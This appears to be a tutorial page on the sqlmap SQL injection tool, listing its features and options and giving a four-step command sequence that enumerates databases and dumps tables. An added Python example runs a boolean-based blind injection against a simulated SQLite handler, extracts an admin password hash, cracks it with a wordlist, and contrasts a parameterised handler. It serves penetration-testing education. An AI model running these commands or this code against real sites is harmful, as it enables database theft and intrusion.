SQL Map (sqlmap)



What is Sqlmap?
sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It includes a powerful detection engine, many niche features for the experienced penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Is Sqlmap free?
Yes. sqlmap is free, open source software (released under the GPLv2) and works out of the box with Python 2.6.x, 2.7.x and 3.x on any platform.

  1. Full support for the MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  3. Support for connecting directly to the database without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support for enumerating users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack.
  6. Support for dumping database tables entirely, a range of entries, or specific columns, as the user chooses. The user can also choose to dump only a range of characters from each column's entry.
  7. Support for searching for specific database names, specific tables across all databases, or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials, where the relevant column names contain strings like name and pass.
  8. Support for downloading and uploading any file from the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support for executing arbitrary commands and retrieving their standard output on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support for establishing an out-of-band stateful TCP connection between the attacker machine and the operating system underlying the database server. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as the user chooses.
  11. Support for escalating the privileges of the database process' user via Metasploit's Meterpreter getsystem command.

Some options for python sqlmap.py

Helpful Stuff
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program’s version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)

Target: At least one of these options has to be provided to define the target(s)
-d DIRECT Connection string for direct database connection
-u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”)
-l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
-x SITEMAPURL Parse target(s) from remote sitemap(.xml) file
-m BULKFILE Scan multiple targets given in a textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file

What are the Typical Uses for sqlmap
sqlmap is written in Python and is widely regarded as the most powerful and popular SQL injection automation tool available. Given the URL of a vulnerable HTTP request, sqlmap can exploit the remote database and extract database names, tables, columns and all the data in those tables. Under certain conditions (see items 8 and 9 above) it can even read and write files on the remote file system and run operating system commands. sqlmap is to SQL injection what Metasploit is to exploitation in general.


How To Install and Run sqlmap
sqlmap works best on Linux; Kali Linux, BackBox and similar pentesting distributions ship it as a package. Either install that package or clone the current development version from the project's GitHub repository (https://github.com/sqlmapproject/sqlmap) and run python sqlmap.py from the checkout.

The four steps below follow the same path as the features list: enumerate databases, then tables, then columns, then dump. Keep the quotation marks around the URL: a query string with more than one parameter contains an ampersand, which an unquoted shell command would treat as a background-job operator. Add --batch to accept sqlmap's default answers when running unattended, and note that sqlmap records its findings in a session file, so later steps reuse the injection point found in Step 1 instead of re-detecting it.

Step 1: sqlmap -u "http://www.yourwebsiteurl.com/section..." --dbs

Step 2: sqlmap -u "http://www.yourwebsiteurl.com/section..." -D database_name --tables

Step 3: sqlmap -u "http://www.yourwebsiteurl.com/section..." -D database_name -T table_name --columns

Step 4: sqlmap -u "http://www.site.com/section.php?id=51" -D database_name -T table_name -C column_name --dump
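To show what these four steps automate, here is an added example (not code from this page or from the sqlmap project) that performs a boolean-based blind injection, the second of the six techniques listed above, by hand against a simulated target. The target is an assumption: an in-memory SQLite database with invented news and users tables, behind a handler that concatenates the id parameter into its query and reveals only whether an article rendered. The attack recovers the table list and the admin password hash one character at a time, then applies a cut-down version of the hash recognition and dictionary attack sqlmap offers at dump time (three formats and a constructed three-word list). The same handler with input validation and a bound parameter sits beside it to show why the attack then yields nothing.

```python
import hashlib
import re
import sqlite3

# Constructed sample backend: an in-memory SQLite database standing in for the
# web application's DBMS. Tables, rows and the admin hash are invented here.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO news VALUES (51, 'Hello'), (52, 'World');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn

# Vulnerable handler (hypothetical section.php?id=<value>): the parameter is
# concatenated into SQL. It returns only whether an article rendered, which is
# all a boolean-based blind attack needs.
def vulnerable_lookup(conn, id_param):
    sql = "SELECT title FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchone() is not None

# Hardened handler: validate the type and bind the value as a parameter, so the
# DBMS never parses attacker-controlled text as SQL.
def safe_lookup(conn, id_param):
    try:
        article_id = int(id_param)
    except ValueError:
        return False
    row = conn.execute("SELECT title FROM news WHERE id=?", (article_id,)).fetchone()
    return row is not None

class CountingOracle:
    """Wraps a handler as a true/false oracle and counts the requests it took."""
    def __init__(self, handler, conn):
        self.handler, self.conn, self.requests = handler, conn, 0

    def __call__(self, payload):
        self.requests += 1
        return self.handler(self.conn, payload)

def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of SQL expression `expr` through a boolean
    oracle: one length probe per position, then a binary search over printable
    ASCII. SQLite spells the helpers UNICODE()/SUBSTR(); other DBMS differ."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"51 AND LENGTH(({expr}))>={pos}"):
            break  # no character at this position: the value is complete
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"51 AND UNICODE(SUBSTR(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

# Simplified hash-format recognition (sqlmap recognises many more formats).
HASH_FORMATS = {32: "MD5", 40: "SHA1", 64: "SHA256"}

def identify_hash(digest):
    if re.fullmatch(r"[0-9a-f]+", digest):
        return HASH_FORMATS.get(len(digest))
    return None

def dictionary_attack(digest, wordlist):
    algo = identify_hash(digest)
    if algo is None:
        return None
    for word in wordlist:
        if hashlib.new(algo.lower(), word.encode()).hexdigest() == digest:
            return word
    return None

def run_attack(handler):
    """Steps 1-4 against one handler: list tables, pull the admin hash, crack
    it. Returns (tables, hash, cracked password, number of requests used)."""
    conn = build_db()
    oracle = CountingOracle(handler, conn)
    tables = blind_extract(oracle, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    admin_hash = blind_extract(oracle, "SELECT pass FROM users WHERE name='admin'")
    cracked = dictionary_attack(admin_hash, ["123456", "letmein", "password"])  # constructed wordlist
    return tables, admin_hash, cracked, oracle.requests

if __name__ == "__main__":
    print("vulnerable:", run_attack(vulnerable_lookup))
    print("hardened:  ", run_attack(safe_lookup))
```

The request counter is the point of the exercise: recovering a 32-character hash this way costs several hundred requests, each of which must be built, sent and classified as true or false, which is exactly the bookkeeping sqlmap does for you (and, against a real DBMS, the part worth rate-limiting and alerting on). Against the hardened handler the first length probe already fails, so the extraction loop returns an empty string after a single request.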


Enjoy and use responsibly!


